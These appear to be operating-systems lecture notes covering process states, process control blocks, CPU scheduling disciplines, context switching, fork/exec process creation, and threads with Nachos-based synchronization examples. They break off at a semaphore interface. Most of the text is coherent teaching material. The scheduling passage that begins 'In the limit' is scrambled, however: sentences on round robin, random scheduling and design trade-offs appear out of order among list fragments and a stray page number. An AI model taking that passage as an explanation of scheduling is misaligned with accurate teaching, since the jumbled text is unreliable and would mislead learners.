• Blocked (waiting) State: When a process blocks, it does so because logically it cannot continue, typically because it is waiting for input that is not yet available. Formally, a process is said to be blocked if it is waiting for some event to happen (such as an I/O completion) before it can proceed. In this state a process is unable to run until some external event happens.
• Ready State: A process is said to be ready if it could use a CPU if one were available. It is runnable but temporarily stopped to let another process run.
• Terminated State: The process has finished execution.
Logically, the 'Running' and 'Ready' states are similar. In both cases the process is willing to run; only in the case of 'Ready' there is temporarily no CPU available for it. The 'Blocked' state is different from the 'Running' and 'Ready' states in that the process cannot run, even if the CPU is available.

Process State Transitions
Following are the six possible transitions among the five states mentioned above.
Transition 1 occurs when a process discovers that it cannot continue; for instance, a running process initiates an I/O operation before its allotted time expires and voluntarily relinquishes the CPU. This state transition is: Block (process-name): Running → Blocked.
Transition 2 occurs when the scheduler decides that the running process has run long enough and it is time to let another process have CPU time. This state transition is: Time-Run-Out (process-name): Running → Ready.
Transition 3 occurs when all other processes have had their share and it is time for the first process to run again. This state transition is: Dispatch (process-name): Ready → Running.
Transition 4 occurs when the external event for which a process was waiting (such as the arrival of input) happens. This state transition is: Wakeup (process-name): Blocked → Ready.
Transition 5 occurs when the process is created. This state transition is: Admitted (process-name): New → Ready.
Transition 6 occurs when the process has finished execution. This state transition is: Exit (process-name): Running → Terminated.
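As an illustrative sketch (state names follow the text; the checking function is invented for demonstration), the five states and the six legal transitions can be captured in C:

    /* Process states and a check for the six legal transitions. */
    #include <stdio.h>

    enum pstate { NEW, READY, RUNNING, BLOCKED, TERMINATED };

    static int legal(enum pstate from, enum pstate to) {
        return (from == NEW     && to == READY)      ||  /* 5: Admitted     */
               (from == READY   && to == RUNNING)    ||  /* 3: Dispatch     */
               (from == RUNNING && to == READY)      ||  /* 2: Time-Run-Out */
               (from == RUNNING && to == BLOCKED)    ||  /* 1: Block        */
               (from == BLOCKED && to == READY)      ||  /* 4: Wakeup       */
               (from == RUNNING && to == TERMINATED);    /* 6: Exit         */
    }

    int main(void) {
        /* A blocked process cannot be dispatched directly; it must be
           woken up to Ready first. */
        printf("%d\n", legal(BLOCKED, RUNNING));  /* prints 0 */
        return 0;
    }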

Process Control Block
A process in an operating system is represented by a data structure known as a process control block (PCB) or process descriptor. The PCB contains important information about the specific process, including:
• The current state of the process, i.e., whether it is ready, running, waiting, or whatever.
• Unique identification of the process, in order to track "which is which" information.
• A pointer to the parent process.
• Similarly, a pointer to the child process (if it exists).
• The priority of the process (a part of CPU scheduling information).
• Pointers to locate the memory of the process.
• A register save area.
• The processor it is running on.
The PCB is a certain store that allows the operating system to locate key information about a process. Thus, the PCB is the data structure that defines a process to the operating system.

Process (computing)
In computing, a process is an instance of a computer program, consisting of one or more threads, that is being sequentially executed by a computer system that has the ability to run several computer programs concurrently. A computer program itself is just a passive collection of instructions, while a process is the actual execution of those instructions. Several processes may be associated with the same program; for example, opening up several instances of the same program often means more than one process is being executed. Each execution of the same set of instructions is known as an instance: a completely separate instantiation of the program.
A single computer processor executes one or more (multiple) instructions at a time (per clock cycle), one after the other (this is a simplification; for the full story, see superscalar CPU architecture). To allow users to run several programs at once (e.g., so that processor time is not wasted waiting for input from a resource), single-processor computer systems can perform time-sharing. Time-sharing allows processes to switch between being executed and waiting (to continue) to be executed. In most cases this is done very rapidly, providing the illusion that several processes are executing 'at once'. (This is known as concurrency or multiprogramming.) Using more than one physical processor on a computer permits true simultaneous execution of more than one stream of instructions from different processes, but time-sharing is still typically used to allow more than one process to run at a time. (Concurrency is the term generally used to refer to several independent processes sharing a single processor; simultaneous is used to refer to several processes, each with their own processor.) Different processes may share the same set of instructions in memory (to save storage), but this is not known to any one process. In the computing world, processes are formally defined by the operating system (OS) running them, and so may differ in detail from one OS to another.
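Returning to the PCB fields listed above, here is a hedged sketch of how such a control block might look as a C struct (the field names and sizes are invented; real kernels differ considerably):

    /* Illustrative process control block. */
    #include <stdint.h>
    #include <stdio.h>

    enum pstate { NEW, READY, RUNNING, BLOCKED, TERMINATED };

    struct pcb {
        int          pid;         /* unique identification            */
        enum pstate  state;       /* current state of the process     */
        int          priority;    /* CPU scheduling information       */
        struct pcb  *parent;      /* pointer to parent process        */
        struct pcb  *child;       /* pointer to first child, if any   */
        uintptr_t    memory_map;  /* pointer to locate process memory */
        uint64_t     regs[32];    /* register save area               */
        int          cpu;         /* processor it is running on       */
    };

    int main(void) {
        struct pcb p = { .pid = 1, .state = READY, .priority = 3 };
        printf("pid %d in state %d\n", p.pid, (int)p.state);
        return 0;
    }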

Sub-processes and multi-threading
A process may split itself into multiple 'daughter' sub-processes or threads that execute in parallel, running different instructions on much of the same resources and data (or, as noted, the same instructions on logically different resources and data). A process that has only one thread is referred to as a single-threaded process, while a process with multiple threads is referred to as a multi-threaded process. Multi-threaded processes have the advantage over multi-process systems that they can perform several tasks concurrently without the extra overhead needed to create a new process and handle synchronised communication between these processes; single-threaded processes, however, have the advantage of even lower overhead. For security and reliability reasons most modern operating systems prevent direct communication between 'independent' processes, providing strictly mediated and controlled inter-process communication functionality.
Multithreading is useful when various 'events' are occurring in an unpredictable order and should be processed in another order than they occur, for example based on response time constraints. Multithreading makes it possible for the processing of one event to be temporarily interrupted by an event of higher priority. For example, a word processor could perform a spell check as the user types, without "freezing" the application: a high-priority thread could handle user input and update the display, while a low-priority background thread runs the time-consuming spell checking utility. The entered text is thus shown immediately on the screen, while spelling mistakes are indicated or corrected after a longer time. Multithreading may also result in more efficient CPU time utilization, since the CPU may switch to low-priority tasks while waiting for other events to occur.
Multithreading allows a server, such as a web server, to serve requests from several users concurrently. One simple solution is one thread that puts every incoming request in a queue, and a second thread that processes the requests one by one in a first-come first-served manner (a sketch of this design follows below). However, if the processing time is very long for some requests (such as large file requests or requests from users with slow network access data rates), this approach results in long response times even for requests that do not require long processing, since they may have to wait in the queue. One thread per request would reduce the response time substantially for many users, and may reduce the CPU idle time and increase the utilization of CPU and network capacity. If the communication protocol between the client and server is a session involving a sequence of several messages and responses in each direction (which is the case in the TCP transport protocol used for web browsing), creating one thread per communication session reduces the complexity of the program substantially, since each thread is an instance with its own state and variables. In a similar fashion, multi-threading makes it possible for a client such as a web browser to communicate efficiently with several servers concurrently.
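As a hedged sketch of the queue-based design just described (assuming POSIX threads; the "requests" are plain integers for illustration), one thread enqueues requests while a worker serves them first-come first-served:

    /* One queue, one worker: FCFS request processing with pthreads. */
    #include <pthread.h>
    #include <stdio.h>

    #define NREQ 5
    static int queue[NREQ], head, tail;      /* tail - head = queued items */
    static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
    static pthread_cond_t nonempty = PTHREAD_COND_INITIALIZER;

    static void *worker(void *arg) {
        (void)arg;
        for (int served = 0; served < NREQ; served++) {
            pthread_mutex_lock(&lock);
            while (head == tail)                  /* sleep until work arrives */
                pthread_cond_wait(&nonempty, &lock);
            int req = queue[head++ % NREQ];
            pthread_mutex_unlock(&lock);
            printf("serving request %d\n", req);  /* do the work off the lock */
        }
        return NULL;
    }

    int main(void) {
        pthread_t tid;
        pthread_create(&tid, NULL, worker, NULL);
        for (int i = 0; i < NREQ; i++) {          /* the enqueueing thread */
            pthread_mutex_lock(&lock);
            queue[tail++ % NREQ] = i;
            pthread_cond_signal(&nonempty);
            pthread_mutex_unlock(&lock);
        }
        pthread_join(tid, NULL);
        return 0;
    }

A thread-per-request server would instead call pthread_create() for each arrival, trading queueing delay for creation overhead.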

Representation
In general, a computer system process consists of (or is said to 'own') the following resources:
• An image of the executable machine code associated with a program.
• Memory (typically some region of virtual memory), which includes the executable code, process-specific data (input and output), a call stack (to keep track of active subroutines and/or other events), and a heap to hold intermediate computation data generated during run time.
• Operating system descriptors of resources that are allocated to the process, such as file descriptors (Unix terminology) or handles (Windows), and data sources and sinks.
• Security attributes, such as the process owner and the process' set of permissions (allowable operations).
• Processor state (context), such as the content of registers, physical memory addressing, etc. The state is typically stored in computer registers when the process is executing, and in memory otherwise.
The operating system holds most of this information about active processes in data structures called process control blocks (PCBs). Any subset of resources, but typically at least the processor state, may be associated with each of the process' threads in operating systems that support threads or 'daughter' processes. The operating system keeps its processes separated and allocates the resources they need so that they are less likely to interfere with each other and cause system failures (e.g., deadlock or thrashing). The operating system may also provide mechanisms for inter-process communication to enable processes to interact in safe and predictable ways.
A process is said to own resources, of which an image of its program (in memory) is one such resource. It is usual to associate a single process with a main program, and 'daughter' ('child') processes with any spin-off, parallel processes, which behave like asynchronous subroutines. The sense of 'process' (or task) is 'something that takes up time', as opposed to 'memory', which is 'something that takes up space'. (Historically, the terms 'task' and 'process' were used interchangeably, but the term 'task' seems to be dropping from the computer lexicon. The above description applies both to processes managed by an operating system and to processes as defined by process calculi.)
If a process requests something for which it must wait, it will be blocked. When the process is in the Blocked State, it is eligible for swapping to disk, but this is transparent in a virtual memory system, where blocks of memory values may really be on disk and not in main memory at any time. Note that even unused portions of active processes/tasks (executing programs) are eligible for swapping to disk; all parts of an executing program and its data do not have to be in physical memory for the associated process to be active.

Process management in multi-tasking operating systems
A multitasking* operating system may just switch between processes to give the appearance of many processes executing concurrently or simultaneously, though in fact only one process can be executing at any one time on a single-core CPU (unless using multi-threading or other similar technology). Processes are often called tasks in embedded operating systems.

*Tasks and processes refer essentially to the same entity, and although they have somewhat different terminological histories, they have come to be used as synonyms. Today, the term process is generally preferred over task, except when referring to 'multitasking', since the alternative term, 'multiprocessing', is too easy to confuse with multiprocessor (which is a computer with two or more CPUs).
We're starting with the CPU as a resource, so we need an abstraction of CPU use. We define a process as the OS's representation of a program in execution, so that we can allocate CPU time to it. (Other definitions range from "the thing pointed to by a PCB" to "the animated spirit of a procedure".) Note the difference between a program and a process: the ls program on disk is a program; the ls instance running on a computer is a process.
In the process model, all software on the computer is organized into a number of sequential processes. A process includes PC, registers, and variables. Conceptually, each process has its own virtual CPU. In reality, the CPU switches back and forth among processes. (The rapid switching back and forth is called multiprogramming.)
First, the process is "created": it is loaded from a secondary storage device (hard disk or CD-ROM...) into main memory. After that, the process scheduler assigns it the "waiting" state. When the process is "waiting", it waits for the scheduler to do a so-called context switch and load the process into the processor. The process state then becomes "running", and the processor executes the process's instructions. If a process needs to wait for a resource (for user input or for a file to open, for example), it is assigned the "blocked" state; the state is changed back to "waiting" when the process no longer needs to wait. Once the process finishes execution, or is terminated by the operating system, it is no longer needed: it is removed instantly or moved to the "terminated" state, where it waits to be removed from main memory.

Inter-process communication
When processes communicate with each other it is called "inter-process communication" (IPC). Operating systems differ from one to another, therefore some mediators (called protocols) are needed. It is possible for the two communicating processes to run even on different machines.

Process states
The various process states are displayed in a state diagram, with arrows indicating the possible transitions between states. The operating system kernel, which allows multi-tasking, needs processes to have certain states. The names of these states are not standardised, but they have similar functionality.

History

By the early 60s, computer control software had evolved from Monitor control software, e.g., IBSYS, to Executive control software. Computers got "faster", but computer time was still neither "cheap" nor fully used. Programs consist of sequences of instructions for the processor. A single processor can run only one instruction at a time, so it is impossible to run more programs in the same moment. A program might need some resource (input, for example) which has a "big" delay, or might start some slow operation (output to a printer, for example); this all leads to the processor being "idle" (unused). To use the processor at all times, the execution of such a program was halted and a second (or nth) program was started or restarted. This is multiprogramming: several programs run "at the same time" (concurrently). At first they ran on a single processor (i.e., uniprocessor) and shared scarce resources. Users perceived that programs ran "at the same time" (hence the term, concurrent). Multiprogramming is also a basic form of multiprocessing, a much broader term.
At that point, the notion of a 'program' was expanded to the notion of an 'executing program and its context', and the concept of a process was born. This became necessary, and possible, with the invention of re-entrant code. Shortly thereafter, the old "multiprogramming" gave way to true multitasking with the advent of time-sharing; later came multiprocessing, shared-memory computers, computer networks, multiple-CPU systems, and multithreading. Threads came somewhat later.

Processes in Action
At any given moment a process is in one of several states: running, ready, or blocked. (These gender-neutral terms are something of an innovation. In the early days of computer science, talk of father and son processes was more common. This tradition worked in reverse at IBM, where processes were female. Because male mammals don't bear young, this is one of the few times where IBM nomenclature is more sensible.)
The transitions between these states are: Dispatch (ready to running), Quantum expired (running to ready), Block for IO (running to blocked), and IO completes (blocked to ready). The functions of the states are:
• Running: the process is executing on the processor. Only one process is in this state on a given processor.
• Blocked: the process is waiting for some external event, for example disk I/O.
• Ready: the process is ready to run.

These states may be defined implicitly: a process is in the ready state if it's on the ready queue, or blocked if it's on a blocked queue. Frequently there is more than one ready or blocked queue: there may be multiple ready queues to reflect job priorities, and multiple blocked queues to represent the events for which the processes are waiting. Good questions to ask are "why does a process leave the running state?" and "how does the OS pick the process to run?" The answers to those questions make up the subtopic of process scheduling.
There are several kinds of schedulers:
• preemptive
• nonpreemptive
• cooperative
• run-to-completion
Run-to-completion schedulers are the easiest to understand. The process leaves the running state exactly once, when it exits, and never enters the blocked state. Examples are batch systems. Some web servers are conceptually run-to-completion, but because they are usually implemented on systems with a more complex scheduler, their behavior is more complex.
Processes in a cooperative multitasking environment tell the OS when to switch them: they explicitly block for I/O or they specifically give up the CPU to other processes. An example is Apple's original multitasking System and some Java systems.
A preemptive multitasking system interrupts (preempts) a running process if it has had the CPU too long and forces a context switch. UNIX is a preemptive multitasking system. The act of removing one process from the running state and putting another there is called a context switch, because the context (that is, the running environment: all the user credentials, open files, etc.) of one process is exchanged for another's. We'll talk more about the details of this next lecture, but you should think about what constitutes a process context.
The time a process can keep the CPU is called the system's time quantum. The choice of time quantum can have a profound effect on system performance. Small time quanta give good interactive performance to short interactive jobs (which are likely to block for I/O). Larger quanta are better for long-running CPU-bound jobs, because they do not incur as many context switches (which don't move their computations forward). If the time quantum is so small that the system spends more time switching processes than doing useful work, the system is said to be thrashing. Thrashing is a condition we shall see in other subsystems as well; the general definition is when a system is spending more time on overhead than on useful work.

In the limit. i. N. It has the advantages that it’s easy to implement.Process Scheduling and Implementation Scheduling Last lecture we discussed half of process scheduling. This is a simple discipline to implement. and each of n processes gets 1/n of the CPU time. Processes are added to the back of the ready queue. which process is scheduled to take its place. B. Today we start with the other half. The algorithms discussed today and variations on them tuned for specific other applications are important tools for your bag of OS design tricks. but gives somewhat unpredictable results. the discipline is called processor sharing. This is our first introduction to scheduling algorithms which will be a repeating topic in the course. The relevant parameters to trade off in process Scheduling includes: • • • • • • • • • • • Response Time for processes to complete. As quanta get larger. that are a scheduling discipline random scheduling. and several other things.. 40 . Why not just pick a process at random? Congratulations. it may be an effective scheduling mechanism! All scheduling mechanisms involve design tradeoffs. when a process gives up the CPU. the OS may want to favor certain types of processes or to minimize a statistical property like average time Implementation Time This includes the complexity of the algorithm and the maintenance Overhead Time to decide which process to schedule and to collect the data needed to make that selection Fairness To what extent are different users’ processes treated differently Some Scheduling Disciplines First-In-First-Out (FIFO) and Round Robin The ready queue is a single FIFO queue where the next process to be run is the one at the front of the queue. disk blocks. Operating systems schedule pages of memory. and with equal sized quanta on a preemptive scheduling system results in each process getting roughly an equal time on the processor. FIFO tends to discriminate against short jobs that give up the CPU quickly for I/O while long CPU-bound jobs hold it for their full quantum. if you have a homogeneous set of jobs.e. a preemptive system with a quanta the size of one machine instruction and no context switch overhead.

Priority Scheduling
FIFO is egalitarian: all processes are treated equally. It is often reasonable to discriminate between processes based on their relative importance. (The payroll calculations may be more important than my video game.) One method of handling this is to assign each process a priority and run the highest priority process. (What to do on a tie puts us back to square one: we pick a scheduling policy.) This solves FIFO's problem with interactive jobs in a mixed workload: interactive jobs are given high priority and run whenever there are some, so interactive jobs are able to run immediately after their I/O completes. Lower-priority CPU-bound jobs share what's left. More complex systems have rules about moving processes between priority levels. (Systems that move processes between multiple priorities based on their behavior are sometimes called multilevel feedback queues.) The CTSS system in Tanenbaum uses a different quantum at each priority scheduling level. Particularly aggressive priority schedulers reschedule jobs whenever a job moves on any queue.
The final problem with priority systems is how to determine priorities. They can be statically allocated to each program (ls always runs with priority 3) or each user (root always runs with priority 3), or computed on the fly (process aging). All of these have their problems.

Priority Problems: Starvation and Inversion
Starvation is simpler to understand. Imagine our 2-level priority system above with an endless, fast stream of interactive jobs. Any CPU-bound jobs will never be run. For every scheduling strategy, there is a counter-strategy.
When processes cooperate in a priority scheduling system, there can be interactions between the processes that confuse the priority system. Consider three processes, A, B, C. A has the highest priority (runs first) and C the lowest, with B having a priority between them. A blocks waiting for C to do something. B will run to completion even though A, a higher priority process, could continue if C would run. This is sometimes referred to as a priority inversion. This happens in real systems: the Mars Rover a couple of years ago suffered a failure due to a priority inversion.

Shortest Job First (SJF)
An important metric of interactive job performance is the response time of the process (the amount of time that the process is in the system, i.e., on some queue). Processes are labelled with their expected processing time, and the shortest one is scheduled first. SJF minimizes the average response time for the system. The problem, of course, is determining those response times. In general, the problem of determining run times a priori is impossible. For batch processes that run frequently, guesses are easy to come by. Other programs have run times that vary widely (e.g., a prime tester runs quickly on even numbers and slowly on primes).

There is hope, however, in the form of heuristics (that is, algorithms that provide good guesses). The simplest is to use a moving average. An average run time is kept for each program, and after each run of that program it is recomputed as:

    estimate = α · (old estimate) + (1 − α) · measurement    (for constant α, 0 < α ≤ 1)

Moving averages are another powerful tool for your design toolkit.

Process Implementation
The operating system represents a process primarily in a data structure called a Process Control Block (PCB). (You'll see Task Control Block (TCB) and other variants.) When a process is created, it is allocated a PCB that includes:
• CPU Registers
• Program Counter
• Stack Pointer
• Pointer to Text (program code)
• Pointer to Data
• Pointer to uninitialized data
• Root directory
• Working directory
• Default File Permissions
• File Descriptors
• Process State
• Exit Status
• Process Identifier (pid)
• User Identifier (uid)
• Pending Signals
• Signal Maps
• Other OS-dependent information
These are some of the major elements that make up the process context, although not all of them are directly manipulated on a context switch.
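A tiny C sketch of the moving-average estimator given above (the initial guess and run times are invented):

    /* Moving-average run-time estimator: alpha weights the old estimate
       against the newest measurement. */
    #include <stdio.h>

    static double update_estimate(double old_estimate, double measurement,
                                  double alpha) {   /* 0 < alpha <= 1 */
        return alpha * old_estimate + (1.0 - alpha) * measurement;
    }

    int main(void) {
        double est = 100.0;                    /* initial guess, in ms */
        double runs[] = { 80.0, 60.0, 90.0 };  /* measured run times   */
        for (int i = 0; i < 3; i++) {
            est = update_estimate(est, runs[i], 0.5);
            printf("estimate after run %d: %.1f ms\n", i + 1, est);
        }
        return 0;
    }

Larger alpha makes the estimate change slowly; smaller alpha makes it track the most recent run.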

Context Switching
The act of switching from one process to another is somewhat machine-dependent. A general outline is:
• The OS gets control (either because of a timer interrupt or because the process made a system call).
• Processor state is saved (registers, memory map, floating point state, etc.).
• Operating system bookkeeping is updated (pointer to the current PCB, etc.).
• This process is replaced on the ready queue and the next process is selected by the scheduling algorithm.
• The new process's operating system and processor state is restored.
• The new process continues. (To this process it looks as if a blocking call has just returned, or as if an interrupt service routine (not a signal handler) has just returned.)
Context switches must be made as safe and fast as possible: safe because isolation must be maintained, and fast because any time spent doing them is stolen from processes doing useful work. Linux's well-tuned context switch code runs in about 5 microseconds on a high-end Pentium.

Process Creation
There are two main models of process creation: the fork/exec and the spawn models. On systems that support fork, a new process is created as a copy of the original one and then explicitly executes (exec) a new program to run. In the spawn model the new program and arguments are named in the system call; a new process is created and that program is run directly.
Fork is the more flexible model. It allows a program to arbitrarily change the environment of the child process before starting the new program. Typical fork code looks like the following (the specific adjustments, such as the input file and program name, are illustrative):

    if (fork() == 0) {
        /* Child process: adjust its environment, then run the program. */
        freopen("input.txt", "r", stdin);        /* change standard input */
        signal(SIGALRM, SIG_IGN);                /* block signals for timers */
        execlp("newprog", "newprog", (char *)0); /* run the new program */
        _exit(1);                                /* reached only if exec fails */
    } else {
        /* Parent process */
        wait(NULL);                              /* wait for child to complete */
    }

Any parameters of the child process's operating environment that must be changed must be included in the parameters to spawn, and spawn will have a standard way of handling them. There are various ways to handle the proliferation of parameters that results; for example, AmigaDOS® uses tag lists (linked lists of self-describing parameters) to solve the problem.
The steps to process creation are similar for both models. The OS gains control after the fork or spawn system call, and creates and fills a new PCB. Then a new address space (memory) is allocated for the process. Fork creates a copy of the parent address space, and spawn creates a new

address space derived from the program. Then the PCB is put on the run list and the system call returns.
An important difference between the two models is that the fork call must create a copy of the parent address space. This can be wasteful if that address space will be deleted and rewritten in a few instructions' time. One solution to this problem has been a second system call, vfork, that lets the child process use the parent's memory until an exec is made. We'll discuss other systems to mitigate the cost of fork when we talk about memory management.

CHAPTER 4 THREADS

Threads
Despite the fact that a thread must execute within a process, the process and its associated threads are different concepts. Processes are used to group resources together, and threads are the entities scheduled for execution on the CPU. A thread is a single sequential stream of execution within a process. Because threads have some of the properties of processes, they are sometimes called lightweight processes. In a process, threads allow multiple streams of execution; in many respects, threads are a popular way to improve application performance through parallelism. The CPU switches rapidly back and forth among the threads, giving the illusion that the threads are running in parallel. In an operating system that has a thread facility, the basic unit of CPU utilization is a thread. A thread has, or consists of, a program counter (PC), a register set, and a stack space. Threads are not independent of one another the way processes are; as a result, threads share with the other threads of their process (also known as a task) their code section, data section, and OS resources, such as open files and signals. Like a traditional process (i.e., a process with one thread), a thread can be in any of several states (Running, Blocked, Ready or Terminated). Each thread has its own stack: since a thread will generally call different procedures and thus have a different execution history, it needs a stack of its own.
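As an illustrative sketch (assuming POSIX threads; the values are invented), two threads of one process share its data section while each runs on its own stack:

    /* Two threads sharing the process's globals, each with its own stack. */
    #include <pthread.h>
    #include <stdio.h>

    static int shared = 0;            /* data section: visible to both threads */

    static void *body(void *arg) {
        int local = *(int *)arg;      /* lives on this thread's private stack */
        shared += local;              /* unsynchronized update: a data race in
                                         general (see the accounting example at
                                         the end of this chapter) */
        printf("thread saw local=%d\n", local);
        return NULL;
    }

    int main(void) {
        pthread_t t1, t2;
        int a = 1, b = 2;
        pthread_create(&t1, NULL, body, &a);
        pthread_create(&t2, NULL, body, &b);
        pthread_join(t1, NULL);
        pthread_join(t2, NULL);
        printf("shared = %d\n", shared);   /* usually 3 */
        return 0;
    }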

Process and Threads
A process is an execution stream in the context of a particular process state.
• An execution stream is a sequence of instructions.
• Process state determines the effect of the instructions. It usually includes (but is not restricted to):
o Registers
o Stack
o Memory (global variables and dynamically allocated memory)
o Open file tables
o Signal management information
Key concept: processes are separated; no process can directly affect the state of another process.
The process is a key OS abstraction that users see: the environment you interact with when you use a computer is built up out of processes.
• The shell you type stuff into is a process.
• When you execute a program you have just compiled, the OS generates a process to run the program.
• Your WWW browser is a process.
Organizing system activities around processes has proved to be a useful way of separating out different activities into coherent units.
Two concepts: uniprogramming and multiprogramming.
• Uniprogramming: only one process at a time. Typical example: DOS. Problem: users often wish to perform more than one activity at a time (load a remote file while editing a program, for example), and uniprogramming does not allow this. So DOS and other uniprogrammed systems put in things like memory-resident programs that are invoked asynchronously, but still have separation problems. One key problem with DOS is that there is no memory protection: one program may write the memory of another program, causing weird bugs.
• Multiprogramming: multiple processes at a time. Typical of Unix plus all currently envisioned new operating systems. Allows the system to separate out activities cleanly.
Multiprogramming introduces the resource sharing problem: which processes get to use the physical resources of the machine, and when? One crucial resource: the CPU. The standard solution is to use preemptive multitasking: the OS runs one process for a while, then takes the CPU away from that process and lets another process run. The OS must ensure that all processes get their fair share of the CPU; the key issue is fairness.
How does the OS implement the process abstraction? It uses a context switch to switch from running one process to running another process, and it must save and restore process state.

How does the machine implement a context switch? A processor has a limited amount of physical resources; for example, it has only one register set, but every process on the machine has its own set of registers. Solution: save and restore hardware state on a context switch. The state is saved in the Process Control Block (PCB). What is in the PCB? It depends on the hardware.

• Registers: almost all machines save the registers in the PCB.
• Processor Status Word.
• What about memory? Most machines allow memory from multiple processes to coexist in the physical memory of the machine; some may require Memory Management Unit (MMU) changes on a context switch. But some early personal computers switched all of a process's memory out to disk (!!!).

Operating systems are fundamentally event-driven systems: they wait for an event to happen, respond appropriately to the event, then wait for the next event. Examples:

• A user hits a key. The keystroke is echoed on the screen.
• A user program issues a system call to read a file. The operating system figures out which disk blocks to bring in, and generates a request to the disk controller to read the disk blocks into memory.
• The disk controller finishes reading in the disk block and generates an interrupt. The OS moves the read data into the user program and restarts the user program.
• A Mosaic or Netscape user asks for a URL to be retrieved. This eventually generates requests to the OS to send request packets out over the network to a remote WWW server. The OS sends the packets. The response packets come back from the WWW server, interrupting the processor. The OS figures out which process should get the packets, then routes the packets to that process.
• A time-slice timer goes off. The OS must save the state of the current process, choose another process to run, then give the CPU to that process.

When you build an event-driven system with several distinct serial activities, threads are a key structuring mechanism of the OS. A thread is again an execution stream, in the context of a thread state. The key difference between processes and threads is that multiple threads share parts of their state. Typically, multiple threads are allowed to read and write the same memory (recall that no process could directly access the memory of another process). However, each thread still has its own registers, and each has its own stack — though other threads can read and write the stack memory.

What is in a thread control block (TCB)? Typically just registers; you don't need to do anything to the MMU when you switch threads.

Typically, an OS will have a separate thread for each distinct activity. In particular, the OS will have a separate thread for each process, and that thread will perform OS activities on behalf of the process. In this case we say that each user process is backed by a kernel thread.

• Having a separate thread for each activity allows the programmer to program the actions associated with that activity as a single serial stream of actions and events. The programmer does not have to deal with the complexity of interleaving multiple activities on the same thread. Examples:
  o When a process issues a system call to read a file, its thread handles the low-level details: it figures out which disk accesses to generate and issues the low-level instructions required to start the transfer. It then suspends until the disk finishes reading in the data.
  o When a process starts up a remote TCP connection, its thread handles the low-level details of sending out network packets.
• Having threads share the same address space makes it much easier to coordinate activities: you can build data structures that represent system state and have threads read and write those data structures to figure out what to do when they need to process a request.

Why allow threads to access the same memory? Because inside the OS, threads must coordinate their activities very closely. Examples:

• If two processes issue read file system calls at close to the same time, the OS must make sure that it serializes the disk requests appropriately.
• When one process allocates memory, its thread must find some free memory and give it to the process. The OS must ensure that multiple threads allocate disjoint pieces of memory.

One complication that threads must deal with: asynchrony. Asynchronous events happen arbitrarily as the thread is executing, and may interfere with the thread's activities unless the programmer does something to limit the asynchrony. Examples:

• An interrupt occurs, transferring control away from one thread to an interrupt handler.
• A time-slice switch occurs, transferring control from one thread to another.
• Two threads running on different processors read and write the same memory.

Asynchronous events, if not properly controlled, can lead to incorrect behavior. Examples:

• Two threads need to issue disk requests. The first thread starts to program the disk controller (assume it is memory-mapped, and must issue multiple writes to specify a disk operation). In the meantime, the second thread runs on a different processor and also issues memory-mapped writes to program the disk controller. The disk controller gets horribly confused and reads the wrong disk block.
• Two threads need to write to the display. The first thread starts to build its request, but before it finishes a time-slice switch occurs and the second thread starts its request. The combination of the two threads issues a forbidden request sequence, and smoke starts pouring out of the display.
• For accounting reasons the operating system keeps track of how much time is spent in each user program. It also keeps a running sum of the total amount of time spent in all user programs. Two threads increment their local counters for their processes, then concurrently increment the global counter. Their increments interfere, and the recorded total time spent in all user processes is less than the sum of the local times.

So, programmers need to coordinate the activities of the multiple threads so that these bad things don't happen. Key mechanism: synchronization operations. These operations allow threads to control the timing of their events relative to events in other threads. Appropriate use allows programmers to avoid problems like the ones outlined above.

Thread Creation, Manipulation and Synchronization

We first must postulate a thread creation and manipulation interface. We will use the one in Nachos:

class Thread {
  public:
    Thread(char* debugName);
    ~Thread();
    void Fork(void (*func)(int), int arg);
    void Yield();
    void Finish();
};

• The Thread constructor creates a new thread. It allocates a data structure with space for the TCB.
• To actually start the thread running, you must tell it what function to start running when it runs. The Fork method gives it the function and a parameter to pass to the function.
• What does Fork do? It first allocates a stack for the thread. It then sets up the TCB so that when the thread starts running, it will invoke the function and pass it the correct parameter. It then puts the thread on a run queue someplace. Fork then returns, and the thread that called Fork continues.
• How does the OS set up the TCB so that the thread starts running at the function? First, it sets the stack pointer in the TCB to the stack. Then, it sets the PC in the TCB to be the first instruction in the function. Then, it sets the register in the TCB holding the first parameter to the parameter. When the thread system restores the state from the TCB, the function will magically start to run.
• The system maintains a queue of runnable threads. Whenever a processor becomes idle, the thread scheduler grabs a thread off the run queue and runs the thread. Conceptually, threads execute concurrently; this is the best way to reason about the behavior of threads. But in practice, the OS only has a finite number of processors, and it can't run all of the runnable threads at once. So it must multiplex the runnable threads on the finite number of processors.

Let's do a few thread examples. First example: two threads that increment a variable.

int a = 0;

void sum(int p) {
    a++;
    print("%d : a = %d\n", p, a);
}

void main() {
    Thread *t = new Thread("child");
    t->Fork(sum, 1);
    sum(0);
}

The two calls to sum run concurrently. What are the possible results of the program? To understand this fully, we must break the sum subroutine up into its primitive components.

sum first reads the value of a into a register. It then increments the register, then stores the contents of the register back into a. It then reads the values of the control string, p and a into the registers that it uses to pass arguments to the print routine. It then calls print, which prints out the data.

The best way to understand the instruction sequence is to look at the generated assembly language (cleaned up just a bit). You can have the compiler generate assembly code instead of object code by giving it the -S flag. It will put the generated assembly in a file with the same name as the .c or .cc file, but with a .s suffix.

    la   a, %r0
    ld   [%r0], %r1
    add  %r1, 1, %r1
    st   %r1, [%r0]

    ld   [%r0], %o3      ! parameters are passed starting with %o0
    mov  %o0, %o1
    la   .L17, %o0
    call print

So when the two calls execute concurrently, the result depends on how the instructions interleave. What are the possible results? Each run prints two lines, one from each call to sum; among the possibilities:

    0 : 1   1 : 2        1 : 2   0 : 1        1 : 1   0 : 2        0 : 2   1 : 1
    0 : 1   1 : 1        1 : 1   0 : 1        0 : 2   1 : 2        1 : 2   0 : 2

So the results are nondeterministic: you may get different results when you run the program more than once. Nondeterministic execution is one of the things that make writing parallel programs much more difficult than writing serial programs: it can be very difficult to reproduce bugs.

Chances are, the programmer is not happy with all of the possible results listed above; he or she probably wanted the value of a to be 2 after both threads finish. To achieve this, we must make the increment operation atomic. That is, we must prevent the interleaving of the instructions in a way that would interfere with the additions.

Concept of atomic operation. An atomic operation is one that executes without any interference from other operations — in other words, it executes as one unit. More formally, if several atomic operations execute, the final result is guaranteed to be the same as if the operations executed in some serial order.

Typically we build complex atomic operations up out of sequences of primitive operations. In our case the primitive operations are the individual machine instructions, and we built an increment operation up out of load, store and add machine instructions. We use synchronization operations to make code sequences atomic.

First synchronization abstraction: semaphores. A semaphore is, conceptually, a counter that supports two atomic operations, P and V. Here is the Semaphore interface from Nachos:

class Semaphore {
  public:
    Semaphore(char* debugName, int initialValue);
    ~Semaphore();
